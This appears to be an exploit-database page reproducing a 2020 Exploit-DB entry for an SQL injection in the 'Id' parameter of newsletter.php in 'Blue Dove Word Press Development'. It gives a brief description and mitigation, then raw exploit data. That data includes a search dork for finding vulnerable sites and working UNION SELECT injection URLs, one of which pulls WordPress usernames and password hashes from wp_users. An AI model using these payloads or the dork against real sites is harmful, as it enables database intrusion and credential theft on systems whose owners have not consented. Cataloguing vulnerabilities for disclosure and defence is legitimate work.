header-logo
Suggest Exploit
vendor:
Blue Dove Word Press Development
by:
HackXBack
7,5
CVSS
HIGH
Sql Injection
89
CWE
Product Name: Blue Dove Word Press Development
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Blue Dove Word Press Development

The vulnerability exists due to insufficient filtration of user-supplied input in 'Id' parameter in 'newsletter.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database, gain access to sensitive data, modify data, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also use stored procedures and parameterized queries to prevent SQL injection.
Source

Exploit-DB raw data:

####################################################################
.:. Author : HackXBack [h-b@usa.com]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : Blue Dove Word Press Development

.:. Bug Type : Sql Injection
.:. Dork : "powered by Blue Dove Web Design"

####################################################################

===[ Exploit ]===

http://server/path/file.php?id=null[SQL]

http://server/newsletter/newsletter.php?Id=null[SQL]


===[ Example ]===

http://server/sections/newsletter.php?Id=-30%20union%20select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14

http://server/newsletter/newsletter_new.php?Id=107+and+1=2+UNION%20SELECT%201,2,3,4,5,concat%28user_login,0x3a,user_pass%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50+from+jam_jam2.wp_users

http://server/newsletter/newsletter.php?Id=-null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,@@version,29,30,31,32,33,34,35,36,37,38,39,40





####################################################################

Greats T0: AtT4CKxT3rR0r1ST & All Member Sec Attack

Navigation

Suggest Exploit

Services By CQR